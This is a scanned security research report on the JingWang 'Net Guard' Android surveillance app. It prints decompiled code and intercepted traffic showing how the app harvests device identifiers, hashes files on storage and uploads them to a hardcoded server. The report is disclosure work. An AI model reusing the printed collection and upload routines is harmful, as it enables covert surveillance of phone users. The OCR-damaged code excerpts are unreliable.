Introduction 


The OTF ( www.opentech.fund) requested our research team investigate the JingWang 
application (GA_AJ_JK_GXH.apk) as currently distributed publicly during the Sept/Oct 2017 
time-frame. This investigative review also touched four other applications versions that were 
acquired by an Internet freedom security research team prior to the start of our research 
team's review. 

The six questions are: 

1. What local data is accessed, stored and/or recorded by the application? 

2. Where is data sent/stored? 

3. Are there any backdoors or surveillance type features in the app? 

4. What is the update process of the application? 

5. What is the security of the access, storage, and recording of data? 

6. What privacy problems might be in the application? 

Our research team's answers and investigative evidence for OTF's six questions are found 
below. The answers are followed by appendices outlining the OPSSEC considerations during 
testing, a listing of which APKs were provided, and also details on the web server used for 
updates. Additional artifacts such as file hash list and applications strings were provided 
separately to OTF. 



Ql: What local data is accessed, stored and/or recorded by the application? 


GA_AJ_JK_GXH.apk (Net Guard Application): 

The application extracts a device's essential information, which includes its IMEl, MAC Address, 
manufacturer, model, phone number, and subscriber ID. It also performs a file scan on the 
device's external storage, in which it will record metadata of each file and store it in its local 
database. There is also a feature that takes screenshots of the list of flagged dangerous files and 
exports them to the device's image gallery,. This is further examined below. 

First, the application extracts the user's essential information. 


GA_AJ_3K_GXH/jd/snc/com/itap/utils/ExecuteThread.java: 

82 private String getlBXXQ 

83 { 

84 try 

85 { 

86 String strl = isTRN(isNull(EssentialInformation.getSBMC())); 

87 String str2 = isTRN(isNull(EssentialInformation.getIMEI(this.context))); 

88 String str3 = isTRN(isNull(EssentialInformation.getMacAddress(this.context))); 

89 String str4 = isTRN(isNull(EssentialInformation.getPhoneCsModel())); 

90 String str5 = isTRN(isNull(EssentialInformation.getPhoneModel())); 

91 String str6 = isTRN(isNull(EssentialInformation.getLinel\lum(this.context))); 

92 String str7 = isTRN(isNull(EssentialInformation.getIMSI(this.context))); 

93 strl = strl + "\t" + str2 + "\t" + str3 + "\t" + "3c" + "\t" + str4 + "\t" + str5 + 
"\t" + str6 + "\t" + str7 + "\t" + ”3c"; 

94 return strl; 


Then application recursively scans the phone's external storage for files, in which it will record 
the name, path, size, MD5 hash of the file, and the MD5 of the MD5 hash of each file. 


GA_A1_1K_GXH/jd/src/com/itap/utils/ExecuteThread.java: 

337 private void scanFile(String paramString) 

338 { 

339 Object localObject = new File(paramString); 

340 if (!((File)localObject).existsQ) {} 

341 do 

342 { 

343 do 

344 { 

345 for (;;) 

346 { 

347 return; 

348 if (!((File)localObject).isDirectory()) { 

349 break; 

350 } 

351 paramString = ((File)localObject).listFiles(); 

352 if (paramString != null) 

353 { 

354 int j = paramString.length; 

355 int i = 0; 

356 while (i < j) 

357 { 

358 localObject = paramString[i]; 

359 if (localObject != null) { 

360 scanFile(((File)localObject).getAbsolutePathQ); 

361 } 

362 i += 1; 







} 


363 

364 } 

365 } 

366 } while ((!((File)localObject).isFile()) || (panamStning.indexOf<= -1)); 

367 localObject = panamStning. substning(panamStning. lastlndexOf (".+ 1) .tollpperCase(); 

368 } while 

( M ,3GP, AMR,AVI, WEBM,FLV,IVX,M4A,MP3,MP4,MPG,RMVB, RAM,WMA,WMV,TXT, HTML, CHM, PNG, !JPG,".indexOf(", 
" + (Stning)localObject + ",") <= -1); 

369 this.list_file.add(panamStning); 

370 } 

399 scanFile(Envinonment.getExtennalStonageDinectony().getAbsolutePath()); 

Note that the application looks for files ending with the following extensions: 

• 3GP 

• AMR 

• AVI 

• WEBM 

• FLV 

• IVX 

• M4A 

• MP3 

• MP4 

• MPG 

• RMVB 

• RAM 

• WMA 

• WMV 

• TXT 

• HTML 

• CHM 

• PNG 

• JPG 

This list is then looped over and a WJXX object containing each file name (lines 140,144), path 
(lines 133, 143), size (lines 135,142), MD5 hash of the file (lines 138, 146), and the MD5 of the 
MD5 hash (lines 139, 145) of the file will be added to another list. 

GA_A3_3K_GXH/jd/snc/com/itap/utils/ExecuteThnead.java: 

120 private List<W3XX> loopListQ 

121 { 

122 Constant.isFlat = false; 

123 sendMessage(WeiboDialogUtils.handler, 1); 

124 sendMessage(WeiboDialogUtils.handler, "0/" + this.list_file.size(), 3); 

125 int j = 3; 

126 ArrayList localArrayList = new ArrayListQ; 

127 int i = 0; 

128 for (;;) 

129 { 

130 


if (i >= this.list_file.size()) { 




return localArrayList; 


131 

132 } 

133 String strl = (String)this.list_file.get(i); 

134 Object localObject = new File(strl)j 

135 long 1 = ((File)localObject).length (); 

136 if (1 > 10L) 

137 { 

138 String str2 = FileMD5.getFileMD5((File)local0bject ); 

139 String str3 = MD5Util.getMD5String(str2); 

140 localObject = ((File)localObject).getName(); 

141 IaDXX localWIXX = new WDXXQ; 

142 localWlXX.setWlDX(l); 

143 localWIXX.setWILl(strl)j 

144 locall/OXX.setW3MC((String)localObject); 

145 localWIXX.setW3MD5(str3); 

146 localWIXX.setYW3MD5(str2)j 

147 localArrayList.add(localWlXX); 

148 } 

149 sendMessage(WeiboDialogUtils.handler, i + 1 + "/" + this.list_file.size()j 3)j 

150 float f = this.list_file.size() / 97.0FJ 

151 int k = jj 

152 if ((i + 1) % Integer.parselnt(new DecimalFormat("0").format(f)) == 0) 

153 { 

154 k = j + 1; 

155 sendMessage(WeiboDialogUtils.handlerj kj 2); 

156 } 

157 i += 1; 

158 j = k; 

159 } 

160 } 


There is also an interesting snapshot feature in the application. If after the initial scanning and 
file(s) of interest have been found, a list will be returned and displayed on the screen. If the 
user clicks on the bottom-right button it will take a screenshot saved in yyyy-MM-dd_HH-mm- 
ss.jpg format to the SD card's root directory (/sdcard), exported to the device's image gallery, 
and then removed from the SD card's root directory. 








GA_A3_3K_GXH/jd/src/com/itap/sjga/MainActivity.java 

468 public void onClick(View panamView) 

469 { 

470 switch (panamView.getld()) 

471 { 

472 } 

473 do 

474 { 

475 return; 

476 finish(); 

477 return; 

478 SimpleDateFormat localSimpleDateFormat = new SimpleDateFormat("yyyy-MM-dd_FIFI-mm-ss ", 
Locale.US); 

479 new StringBuilder("/sdcard/").append(localSimpleDateFormat.format(new 
Date())).append(".png").toString(); 

480 paramView = paramView.getRootView(); 

481 paramView.setDrawingCacheEnabled(true); 

482 paramView.buildDrawingCache(); 

483 paramView = paramView.getDrawingCache(); 

484 } while (paramView == null); 

485 try 

486 { 

487 BitmapUtil.saveImageToGallery(this , paramView); 

488 Toast.makeText(this, "|®S,6£?b ", 0).show(); 

489 return; 

490 } 

491 catch (Exception paramView) 

492 { 

493 paramView.printStackTrace(); 

494 } 

495 } 


Its actual intent is not fully understood because it has to be triggered by the user. However, it 
may be a feature used to aid physical policing and data extraction as screen shots of the 
captured files of interest serves as evidence and using the devices image gallery provides an 
easy to use mechanism for sharing (data transfer) handled through the Android operating 
system (Bluetooth, EMail, etc.). 


References: 

• URL server: hxxp://47.93.5.238:8081 

• Base server: hxxp://bxaq.landaitap.com:22222 (hxxp://47.93.5.238:22222) 

• SBMC: ( https://developer.android.eom/reference/android/os/Build.html#MODEL ) 

• IMEI: ( https://en.wikipedia.org/wiki/lnternational Mobile Equipment Identity) 

• MacAddress: ( https://en.wikipedia.org/wiki/MAC address ) 

• PhoneCsModel: 

( https://developer.android.eom/reference/android/os/Build.html#MANUFACTURER ) 

• PhoneModel: 

( https://developer.android.eom/reference/android/os/Build.html#MODEL) 

• LineNum: (phone number) 

• IMSI: ( https://en.wikipedia.org/wiki/lnternational mobile subscriber identity ) 










Q2: Where is data sent/stored? 


GA_AJ_JK_GXH.apk (Net Guard Application): 

The application sends a device's essential (SIM) information as well as metadata of any files 
found in external storage that it deems dangerous to the base server. This is further examined 
below. 

The application makes requests to the base server, which is hardcoded (line 531), with a custom 
"type" flag (line 529) and GXSJ value (line 530), returned by DbDao::queryMB. It is believed that 
this is the application requesting new file signatures to update its local database. 


com/itap/utils/ExecuteThread.java: 

526 public void okHttpService(String paramString) 

527 { 

528 Object localObject = new FormEncodingBuilder()j 

529 ( (FormEncodingESuilder)localObject). add( "type", "lWWS_cshTZM"); 

530 ((FormEncodingESuilder)localObject).add( "GXSl", paramString) j 

531 paramString = new 

Request.Builder().url("http://bxaq.landaitap.com:22222/BXAQ/servlet/front/APPS").post(((FormEn 
codingBuilder)localObject).build()).build(); 

539 

540 public void onResponse(Response paramAnonymousResponse) 

541 throws IOException 

542 { 

543 Object localObject = paramAnonymousResponse.body().string(); 

544 try 

545 { 

546 if (new 3S0N0bject((String)localObject).getBoolean("success")) 

547 { 

548 paramAnonymousResponse = new ArrayListQ; 

549 localObject = new 3SONObject((String)localObject).getlSONArray("data")j 

550 if (((ISONArray)localObject).lengthQ > 0) 

551 { 

552 int i = 0; 

553 for (;;) 

554 { 

555 if (i >= ((ISONArray)localObject).length()) 

556 { 

557 ExecuteThread.this.dbDao.addMB(paramAnonymousResponse)j 

558 return; 

559 } 




[/| Request to http://47.93.5.238:22222 

Forward 

Drop 

Intercept is on 


Action 


Pa rams 

Headers 

Hex 




3 0ST /BXAQ/servlet/front/APPS HTTP/1.1 


Zontent-Type: application/x-www-form-urlencoded 

Zontent-Length: 32 

Host: bxaq.landaitap.com:22222 

Zonnection: close 

^cept-Encoding: gzip, deflate 

Jser-Agent: okhttp/2.7.2 


type=JWWS_cshTZM&GXSJ 



Typically, during a new installation the response from the base server will contain a JSON object 
containing a list of new MB objects that ExecuteThread::okHttpService will then add to the local 
database (line 557). 


Response from http://47.93.5.23S:22222/BXAQ/servlet/front/APP5 

Forward Drop Intercept is on | Action j 


2 


Raw Headers Hex 


HTTP/1.1 200 OK 

Server: Apache-Coyote/1.1 

Set-Cookie: JSESSIONID=BED3C27CD419E84C0A085DAA7ED3C0FB; Path=/BXAQ/; HttpOnly 
Content-Type: text/html; utf-8=;charset=utf-8 
Date: 

Connection: close 
Content-Length: 132505 


{"data":[{"HD5":"6FD7A336D7F0FA6919084785C0DD77D6".' 



’ 12252BE0C7ABD4FF5D9F82A6F2BC9CF7’ 


BFFCA0DD2072E57BD7A4055ACD9D84FB' 


898ABBD2342F17508F48548F340BB9E4' 


1 74F169549B6B1B9BD5F45E98B646212F’ 


'447ECA7E5E423C783B2274AB38AB1BBE ’ 


’ E8159DFDC9793FED6B2554EF33B8A22A' 


"21F23A3EAC6739CF8954F42C2F49E758’ 


' 4D99EB81E5B5981D9429E1A0C10C144D' 


D181D12B5D9CFDB068C080B67D6B1A1C' 



},{"HD5":"567B4147BDF8EDE052344886D15C1052", 


B2EE8582688FD571AE8C65A6F14C2861 


' BD4FA905159E06073CDDAB0013FD72EB 


2D28D4B82CC7C80BDA7C11F9103ECF5A 


' 5839BDBDDCA7A74C53B5BC2FEE51BFAF 


AEC4FAAA72E09E56404BF91F70E2E067 


1055390950C45738FCD42E75D506082A 


'F8507F4452E7CB5A3D3840BD18A986FF 


' E243710840E37647B98BA4A5D9055DDD 


' BD8359DA428DEC50024B91154172B2DE 














































Any subequent requests, with the same install, will result in an empty response. 


Response from http://47.93.5.23S:22222/BXAQ/servlet/frort/APP57typekXXq 
Drop 1 Intercept is on | Action 


Forward 


Raw Headers Hex 


HTTP/1.1 200 OK 

Server: Apache-Coyote/1.1 

Set-Cookie: JSESSIONID=28499A4932C6ED02B5F158A85C6771B1 ; Path=/BXAQ/; HttpOnly 
Content-Type: text/html; utf-8=;charset=utf-8 
Date: 

Connection: close 
Content-Length: 16 

("success":true} 


The applications uploads user data in MainActivity::testUploadFile by compressing two files 
named jbxx.txt and files.txt into a Zip file named JWWS.zip. 


snc/com/itap/sjga/MainActivity.java: 

315 private void testUploadFile(Context paramContext) 

316 { 

321 paramContext = new File(paramContext.getExternalFilesDir(null).getAbsolutePath(), 

"JWWS.zip"); 

322 paramContext = RequestBody.create(MediaType.parse("application/octet-stream"), 

paramContext); 

323 paramContext = new 

MultipartBuilder().type(MultipartBuilder.FORM).addPart(Headers.of(new String[] { "Content- 
Disposition", "form-data; name=\ 323 "AJLY\"" }), RequestBody.create(null, 
this.ajly)).addPart(Headers.of(new String[] { "Content-Disposition", "form-data; 
name=\"QBID\"" }), Request 323 Body.create(null, this.qbid)).addPart(Headers.of(new 
String[] { "Content-Disposition", "form-data; name=\"SJHM\"" }), RequestBody.create(null, th 

323 is.sjhm)).addPart(Headers.of(new String[] { "Content-Disposition", "form-data; 

name=\"JD\"" }), RequestBody.create(null, "")).addPart(Headers.of( 323 new String[] { 

"Content-Disposition", "form-data; name=\"WD\"" }), RequestBody.create(null, 

"")).addPart(Headers.of(new String[] { "Content-Dispo 323 sition", "form-data; 
name=\"mFile\";filename=\"JWWS.zip\"" }), paramContext).build(); 

324 localOkHttpClient.newCall(new 

Request.Builder().url("http://bxaq.landaitap.com:22222/BXAQ/servlet/front/APPS?type=XXCJ").pos 
t(paramContext).b 324 uild()).enqueue(new Callback() 



























1/1 Request to http://47.93.5.238:22222 


Forward Drop Intercept is on Action 


Raw 

Pa rams 

Headers 

Hex 


POST /BXAQ/servlet/front/APPS?type=XXCJ HTTP/1.1 

Content-Type: multipart/form-data; boundary=ff6aaf09-00b2-443f-8752-8626ca01497e 

Content-Length: 1548 

Host: bxaq.landaitap.com:22222 

Connection: close 

Accept-Encoding: gzip, deflate 

User-Agent: okhttp/2.7.2 

--ff6aaf09-00b2-443f-8752-8626ca01497e 
Content-Disposition: form-data; name="AJLY" 

Content-Length: 12 

650102000000 

--ff6aaf09-00b2-443f-8752-8626ca01497e 
Content-Disposition: form-data; name="QBID" 

Content-Length: 0 


The jbxx.txt file contains devices "essential information", which includes the device's IMEl, MAC 
Address, manufacturer, model, phone number, and subscriber ID. 


GA_A1_1K_GXH/jd/src/com/itap/utils/ExecuteThread.java: 


82 

private String ge 

83 

{ 


84 

try 


85 

{ 


86 

String 

strl = 

87 

String 

str2 = 

88 

String 

str3 = 

89 

String 

str4 = 

90 

String 

str5 = 

91 

String 

str6 = 

92 

String 

str7 = 


isTRN(isNull( 

isTRN(isNull( 

isTRN(isNull( 

isTRN(isNull( 

isTRN(isNull( 

isTRN(isNull( 

isTRN(isNull( 


Essentiallnformation 

Essentiallnformation 

Essentiallnformation 

Essentiallnformation 

Essentiallnformation 

Essentiallnformation 

Essentiallnformation 


getSBMC())); 

getIMEI(this.context))); 
getMacAddress(this.context))); 
getPhoneCsModel())); 
getPhoneModel())); 
getLineNum(this.context))); 
getIMSI(this.context))); 
























93 strl = stnl + "\t" + stn2 + "\t" + stn3 + "\t" + "EE" + "\t" + str4 + "\t" + stn5 + 
"\t" + stn6 + "\t" + stn7 + "\t" + "EE"; 

94 return strl; 


The files.txt file contains records of the name, path, size, MD5 hash, and the MD5 of the MD5 
hash of any files whose MD5 hash is a match in the application's local database. The file 
compression happens int ExecuteThread::startSM. If no files match any of the entries in the 
local database only the jbxx.txt file will be Zipped and sent. 


GA_A3_3K_GXH/jd/src/com/itap/utils/ExecuteThread.java: 

380 private void startSMQ 

381 { 

407 AddFile.writeTxtToFile((String)local0bject2, new File((File)local0bject3, 
"jbxx.txt")); 

408 int i = 0; 

409 for (;;) 

410 { 

411 if (i >= ((List)localObjectl).size()) { 

412 Iocal0bject2 = new CompressBook(); 

413 } 

414 try 

415 { 

416 if (new File(Constant. FILEPATH) .existsQ) { 

417 ((CompressBook)localObject2).zip(Constant.FILEPATH); 

418 } 

419 if (new File(this.context.getExternalFilesDir(null).getAbsolutePath(), 

"3WWS.zip").exists()) 

420 { 

421 sendMessage(this.mainUI.handle, localObjectl, 9); 

422 return; 

423 AddFile.writeTxtToFile(((l/OXX)((List)localObjectl).get(i)).getYW3MD5() + 

"\t" + ((W1XX)((List)localObjectl).get(i)).getW3MC() + "\t" + 

((W1XX)((List)localObjectl).get(i)).getW3DX(), new File((File)local0bject3, "files.txt"), 

((W1XX)((List)localObjectl).get(i)).getYW3MD5()); 

424 i += 1; 

425 } 

426 } 


References: 


• URL server: hxxp://47.93.5.238:8081 

• Base server: hxxp://bxaq.landaitap.com:22222 (hxxp://47.93.5.238:22222) 




Q3: Are there any backdoors or surveillance type features in the app? 

GA_AJ_JK_GXH.apk (Net Guard Application): 

The research team did not find any obvious covert backdoor or surveillance features built into 
the application. However, the application does have a surveillance feature that scans the 
device's external storage for files that it deems as "dangerous" and notifies the user while doing 
so. It also requests for permissions that have the potential to be used in malicious manners in 
subsequent updates. This is further examined below. 

The application requests android.permission.READ_EXTERNAL_STORAGE (line 10) and 
android.permission.RECEIVE_BOOT_COMPLETED (line 12) permissions, as shown in its manifest 
file: 


AndnoidManifest.xml: 

3: <uses-permission android:name="android.permission.INTERNET"/> 

4: <uses-permission android:name="android.permission.READ_PHONE_STATE"/> 

5: <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/> 

6: <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> 

7: cuses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/> 

8: cuses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/> 

9: cuses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> 

10: cuses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/> 

11: cuses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/> 

12: cuses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/> 


The READ_EXTERNAL_STORAGE permission allows an application to read from external storage. 
The application uses this permission to discover and read files, in order to produce metadata. 
This data contains the name, path, size, MD5 hash of the file, and the MD5 of the MD5 hash of 
each file. This is illustrated in the decompiled ExecuteThread.java (lines 138-147). 


com/itap/utils/ExecuteThread.java: 

133 String strl = (String)this.list_file.get(i)j 

134 Object localObject = new File(strl)j 

135 long 1 = ((File)localObject).length()j 

136 if (1 > 10L) 

137 { 

138 String str2 = FileMD5.getFileMD5((File)local0bject)j 

139 String str3 = MD5Util.getMD5String(str2 ); 

140 localObject = ((File)localObject).getName()j 

141 WHXX localWHXX = new WHXX(); 

142 localWHXX.setWHDX(l); 

143 localWHXX.setWHLH(strl); 

144 localWHXX.setWHMC((String)localObject)j 

145 localWHXX.setWHMD5(str3); 

146 localWHXX.setYWHMD5(str2 ); 

147 localArrayList.add(localWHXX); 

148 } 


The application compares this data against a local database of MD5 file hashes to decide 
whether a local file is dangerous, in which it will inform the base server and prompt the user to 
delete this file(s). 








This is extent of how this permission is used. However, the fact that the application has read 
access to external storage is worrisome. Further updates could use this permission in more 
malicious manners, unknowingly to the user. 

RECEIVE_BOOT_COMPLETED 

• Allows an application to start itself as soon as the system has finished booting. This can 
make it take longer to start the phone and allow the application to slow down the 
overall phone by always running. 

The application requests this permission, but it is not actually implemented anywhere. There is 
a potential that this is an artifact from a previous or sister version of the application. If it were 
implemented the application could start and perform scanning features right when a user's 
phone is finished booting, unknowingly to the user. Currently, it has only been observed that 
the application runs and performs functionality while the application is in main view. More 
specifically, when MainActivity::onCreate is called, meaning when the application is first started 
and any time the it is switched back into foreground from the background. 

For more information regarding permissions usage and implications, refer to section What is 
the security of the access, storage, and recording of data? for more information. 

References: 

• URL server: hxxp://47.93.5.238:8081 

• Base server: hxxp://bxaq.landaitap.com:22222 (hxxp://47.93.5.238:22222) 



Ql: What is the update process of the application? 

GA_AJ_JK_GXH.apk (Net Guard Application): 

The application updates itself by checking and downloading newer APKs and by querying an 
application server for metadata to update its local database. Newer versions of the APK are 
found by comparing its current version with a version file located in the URL server. If a later 
version exists, it will download it directly, open it, and prompt the user to install it. It 
additionally makes requests to the base server to update its local database containing metadata 
of files that it deems dangerous. These checks are performed when the application is explicitly 
started or switched back from the background. This is further examined below. 

The QR code (see image below) seems to be the initial point of download and installation of the 
application, whose app_name (/f^Hdr) roughly translates to Net Guard. The QR code 
decodes to an URL 

(hxxp://47.93.5.238:8081/APP/GA_AJ_JK/GA_AJ_JK_GXH.apk?AJLY=650102000000) which 
points to will perform a download of the APK file. Directing a phone to this link triggers a 
download of an APK named GA_AJ_JK_GXH.apk. 
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G/WU_JK_GXH.apk 4:37 am 

Download complete. 
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Upon verifying its signature, there will be a SHA1 mismatch on res/raw/text.txt: 


% jarsigner -verify -verbose -certs /Users/nil/shared/new/GA_Ai_iK_GXH.apk 
jarsigner: java.lang.SecurityException: SHA1 digest error for res/raw/text.txt 


This file contains the URL parameters used in the QR code URL 
(AJLY=650102000000&QBID=&SJH=). 

The APK is signed with the following certificate: 


[ 

[ 

Version: V3 
Subject: CN=Landa 

Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 
Key: 

Validity: [From: Fri Apr 28 07:01:45 UTC 2017, 

To: Sat Apr 16 07:01:45 UTC 2067] Issuer: CN=Landa 
SerialNumber: [ 1134c7d3] 

Certificate Extensions: 1 

[1]: Objectld: 2.5.29.14 Criticality=false 

SubjectKeyldentifier [ 

Keyldentifier [ 

0000: B5 CB CC B2 63 26 9B 15 63 E2 AA C4 83 9D 50 5E _ C&..C .P A 0010: A2 EF D7 E2 _ 

] 

] 

] 

Algorithm: [SHA256withRSA] Signature: 
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The application performs version checks every time the application loads the main view. More 
specifically, when MainActivity::onCreate is called, meaning when the application is first started 
and any time the application is switched back into foreground from the background. The 
version checking functionality is performed in a roundabout manner. In the application's 
MainActivity::onCreate, it first calls a function called initJCGX. 


com/itap/sjga/MainActivity.java 

497 protected void onCreate(Bundle paramBundle) 

498 { 

499 super.onCreate(paramBundle); 

500 setContentView(2130903040 ); 

501 initView()j 

502 initEventQ; 

503 initXGX(); 

504 } 













This function's purpose is to spin up a ExecuteThread Runnable thread. 


com/itap/sjga/MainActivity.java 

285 private void init2CGX() 

286 { 

287 Constant.excutir.execute(new ExecuteThread(this, this)); 

288 } 


ExecuteThread::run is the entry point to the version checking, application updating, file 
scanning, database updating, and data uploading code paths. This Runnable thread will loop 
with five second delays until either the MainActivity is destroyed (line 584) and the application 
terminates, the latest APK version is less than or equal to what is currently installed (line 593) 
and the application performs file scanning, or the latest APK is newer and needs to be 
downloaded (line 598). 


com/itap/utils/ExecuteThread.java: 

579 public void run() 

580 { 

581 for (;;) 

582 { 

583 if (this.mainUI.isFinishingO) { 

584 return; 

585 } 

586 int i = CheckVersion(); 

587 if (this.mainUI.getToastDialogO .isShowingO) { 

588 this.mainUI.getToastDialog().dismiss(); 

589 } 

590 if ((i == -1) || (i == 0)) 

591 { 

592 startSM(); 

593 return; 

594 } 

595 if (i == 1) 

596 { 

597 sendMessage(this.mainUI.handle, this.info, 1); 

598 return; 

599 } 

600 sendMessage(this.mainUI.handle, 2); 

601 try 

602 { 

603 Thread.sleep(5000L); 

604 } 

605 catch (InterruptedException locallnterruptedException) 

606 { 

607 locallnterruptedException.printStackTrace(); 

608 } 

609 } 

610 } 

611 } 


When CheckVersion is called it makes a request for a version.xml file on URL server (line 10), 
which is a string referenced from the application's res/values/strings.xml file: 


res/values/strings.xml: 

1 <?xml version="1.0" encoding="utf-8"?> 

2 <resources> 

3 <string name="app_name">/#[«ni±</string> 





4 <stning name="title_alert">Sl7R'(fTix/string> 

5 <stning name="ok">ft£</stning> 

6 <stning name="cancel">5kfd</stning> 

7 <stning name="exit">S§7jT</string> 

8 <stning name="exit_app">^; ; ili ; ffiUr^5^? </stning> 

9 <stning name="confinm">fftA&</stning> 

10 <stning 

name="unl_senven">http://47.93.5.238:8081/APP/VERSION/jlngwangweishi_vension/version.xml</stni 
ng> 

11 <stning name="bbsj">iiS7^3 : Mfi</stning> 

12 <stning name=" jcxbb">fu/ilJPJjftSfr)K^, BSHtSIff ! </stning> 

13 <stning name="gx">£0r</stning> 

14 <stning name="ydwl">^itff[S]tn^ip2G/3G/4G, fftS'fi'cS'JlLiff ? </stning> 

15 <stning name="ts">$§7X</string> 

16 <stning name="qd">ft£</stning> 

17 <stning name="qx">57ffl</stning> 

18 <stning name="gb">7^Rl</stning> 

19 <stning name="gxz">EftTi)ojil0T</string> 

20 </nesounces> 


The request is performed by ExecuteThread::CheckVersion via GET request to the url_server 
string located in strings.xml. 


com/itap/utils/ExecuteThread.java: 

456 String str = 

this.context.getPackageManager().getPackageInfo(this.context.getPackageName(), 0).versionName; 

457 Iocal0bject2 = localObject4; 

458 localObjectl = localObject5; 

459 HttpURLConnection localHttpURLConnection = (HttpURLConnection)new 

URL(this.context.getResources().getString(2131230727)).openConnection (); 

465 localHttpURLConnection.setRequestMethod("GET"); 


As seen below, a typical response is XML and contains a version string, the URL to the file, and a 
description. 




Response from http://47.93.5.23S:B0S1 /APP/VERSI0N/jingwangwejshi_version/version.xmI 


Forward 

Drop Intercept is on 

Action 




Raw 

Headers 

Hex 

XML 



HTTP/1.1 200 OK 

Server: Apache-Coyote/1.1 

Accept-Ranges: bytes 

ETag: W/"230-1501747279000" 

Last-Modified: 

Content-Type: application/xml;charset=utf-8 
Content-Length: 230 
Date: 

Connection: close 

<?xml version="1.0'' encoding="utf-8"?> 

<info> 

<version>l.3</version> 

<url>http://47.93.5.238:8081/APP/GA_AJ_JK/GA_AJ_JK_GXH.apk</url> 

<description>DDD000000QQ000</description> 

</info> 

<?xml vension="1.0" encoding="UTF-8"?> 

<info> 

<version>l.3</version> 

<unl>hxxp://47.93.5.238:8081/APP/GA_A3_3K/GA_A3_3K_GXH.apk</unl> 
xdescniptionsl^IIJSlJSSflK^, ! </descniption> 

</info>% 


As previously stated, if the latest APK version is less than or equal to what is currently installed 
then the application will start scanning files. More specifically, this occurs in the 
ExecuteThread::run method. If ExecuteThread::CheckVersion returns a status code of 0 or -1, 
ExecuteThread::startSM where the file scanning and local database updating occurs. 


com/itap/utils/ExecuteThread.java: 

579 public void run() 

580 { 

581 for (;;) 

582 { 

583 if (this.mainUI.isFinishingO) { 

584 return; 

585 } 

586 int i = CheckVersion()j 

587 if (this.mainUI.getToastDialogO .isShowingO) { 

588 this.mainUI.getToastDialog().dismiss()j 





























589 } 

590 if ((i == -1) || (i == 0)) 

591 { 

592 startSMQ; 

593 return; 

594 } 

GA_A1_1K_GXH/jd/src/com/itap/utils/ExecuteThread.java: 

380 private void startSMQ 

381 { 

382 try 

383 { 

384 Object Iocal0bject3 = readFile(2131034112, this.context); 

385 this.dbDao = new DbDao(this.context); 

386 Object Iocal0bject2 = this.dbDao.queryMBQ; 

387 Object localObjectl = Iocal0bject2; 

388 if ("".equals(local0bject2)) 

389 { 

390 this.dbDao.addMB(((String)local0bject3).split(",")); 

391 localObjectl = this. dbDao. queryMBQ; 

392 } 

393 okHttpService((String)localObjectl); 

394 WeiboDialogUtils.handler.postDelayed(new WeiboDialogUtils.ProgressTask(), 3000L); 

395 Iocal0bject2 = getDBXXQ; 

396 if (!"".equals(Iocal0bject2)) 

397 { 

398 this.dbDao.addlBXX((String)local0bject2); 

399 scanFile(Environment.getExternalStorageDirectoryO.getAbsolutePath()); 

400 localObjectl = loopListQ; 

401 this.dbDao.addYCXX((List)localObjectl); 

402 ((List)localObjectl).clear(); 

403 localObjectl = this.dbDao.queryYFIXXQ; 

404 Iocal0bject3 = new File(this.context.getExternalFilesDir(null).getAbsolutePath() + 
"/3WWS/]WWS/shouji_anjian/"); 

405 deleteFile((File)local0bject3); 

406 ((File)localObject3).mkdirs(); 

407 AddFile.writeTxtToFile((String)local0bject2, new File((File)local0bject3, 
"jbxx.txt")); 

408 int i = 0; 

409 for (jj) 

410 { 

411 if (i >= ((List)localObjectl).size()) { 

412 Iocal0bject2 = new CompressBook(); 

413 } 

414 try 

415 { 

416 if (new File(Constant. FILEPATFI) .existsQ) { 

417 ((CompressBook)localObject2).zip(Constant.FILEPATH); 

418 } 

419 if (new File(this.context.getExternalFilesDir(null).getAbsolutePath()j 

"3WWS.zip").exists()) 

420 { 

421 sendMessage(this.mainUI.handle, localObjectl, 9); 

422 return; 

423 AddFile.writeTxtToFile(((W1XX)((List)localObjectl).get(i)).getYW3MD5() + 

"\t" + ((W1XX)((List)localObjectl).get(i)).getWlMCQ + "\t" + 

((W1XX)((List)localObjectl).get(i)).getW3DX(), new File((File)local0bject3, "files.txt"), 

((W1XX)((List)localObjectl).get(i)).getYW3MD5()); 

424 i += 1; 

425 } 

426 } 

427 catch (Exception localException2) 

428 { 



429 for (;;) 

430 { 

431 localException2.printStackTrace(); 

432 } 

433 } 

434 } 

435 } 

436 return; 

437 } 

438 catch (Exception localExceptionl) 

439 { 

440 localExceptionl.printStackTrace(); 

441 } 

442 } 


The file read (line 384) is referenced from its string ID 2131034112. A decompiled project 
reveals the variable name in the application's R file. 


% grep -nr 2131034112 * 

jd/src/com/example/dzsjga/R.java:136: public static final int aj_jwws_buk = 2131034112; 


The file is a comma separated list of serialized MB objects containing an MD5 hash (line 6) and 
GXSJ value (line 5) shown in the MB class. This file, assumingly, acts as an initial dataset of files 
of interest that comes pre-packaged with the APK. 


jd/src/com/itap/model/MB.java: 

3 public class MB 

4 { 

5 public String GXS1; 

6 public String MD5; 

% file apktool/GA_Al_3K_GXH/res/raw/aj_jwws_buk 

apktool/GA_Al_3K_GXH/res/raw/aj_jwws_buk: ASCII text, with very long lines, with no line 
terminators 

% head -c 400 apktool/GA_Al_lK_GXH/res/raw/aj_jwws_buk 

52385c431c3de3eded87e33093d45f53,881b5f01b963a80d8dl2e5b0d399alca,lde0a900eb4c69cdfa6398f003e2 

650b,6311c92f456961321f4b32e52b26bc3b,d3e6906e50300ed6e6dldf6clff7c539,61cd623b01bec813bd2f789 

ab6dc4 

2d6,el9793fc7d62d48643eb304ffd641110,46e0d6d23f96df6aa93a5bacf9d86666,dd6eccb5bbca92eb302b90b5 

027fc5fd,a4dlf0cede848698051be67f83956fl8,486ff45360c0ad488b473819956473c5,6cd2d53f924bdlefll5 

dbdccf 

f43bdla,dl2a% 


A SQLite database is then initialized and the ajjwws_buk MB objects are loaded (lines 59, 62, 
63) into this database. The GXSJ value is also referred to as rksj (line 46). 


com/itap/dbservice/DbDao.java: 

38 public void addMB(List<MB> paramList) 

39 { 

40 this.db = this.mOpenHelper.getWritableDatabase(); 

41 SQLiteStatement localSQLiteStatement; 

42 int i; 

43 if (this.db.isOpen()) 

